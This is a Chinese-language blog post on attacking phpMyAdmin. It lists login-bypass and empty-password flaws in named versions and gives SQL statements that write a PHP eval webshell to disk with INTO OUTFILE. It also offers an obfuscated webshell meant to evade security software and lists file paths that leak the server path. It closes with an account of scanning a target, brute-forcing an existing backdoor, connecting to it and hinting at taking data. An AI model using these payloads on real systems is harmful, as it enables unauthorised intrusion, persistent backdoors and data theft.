1. 程式人生 > >PHPmyadmin漏洞和拿shell

PHPmyadmin漏洞和拿shell

phpmyadmin的漏洞相對來說,還是比較多的,對於新手來說,分享幾個漏洞,深入的處於程式碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。
phpmyadmin2.11.9.2 這個版本存在空口令。直接root使用者登陸,密碼不用
找這個的話 用自己的寫的指令碼,或者搜素引擎什麼的,這裡懂的人就懂了,不懂也不在這裡。.關於拿shell,----》root許可權,並且有寫檔案許可權 ----》匯出的目錄有寫許可權 ----》有的情況下,就算你這兩個都有,但是伺服器的一些配置還是會對這個有影響。
在getshell之前先進入一個數據庫
第一種,使用sql語句,建立一個表,新增一個欄位,欄位的內容為一句話,然後匯出到php檔案中,最後刪除這個表,這個是最保險的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個是直接寫入
select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然後,一般的話,一句話都是
<?php @eval($_POST[x])?>
有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現在應該還可以過
<?php
$a = 's';
$str = str_repeat($a,2);
$to = $_POST;
//echo $str;
$exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
$exp($to['x'])
?>
找路徑的話,
1// 利用phpinfo.php
2//利用phpmyadmin的一些檔案報錯,下面都是網上通用的
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
/phpmyadmin/libraries/export/xls.php
3//再者就是利用網站包路徑,這些會的都會了,不會的慢慢的就會了。

下面開始實戰,指令碼掃到一個IP,顯示存在phpmyadmin,開啟


一看這些php檔案就是後門一句話,放到幾萬字典爆破,兩秒鐘


直接菜刀連結。。。。。
這個肯定被人搞了,直接打包好東西,你懂的。。。提權什麼的就不必要了。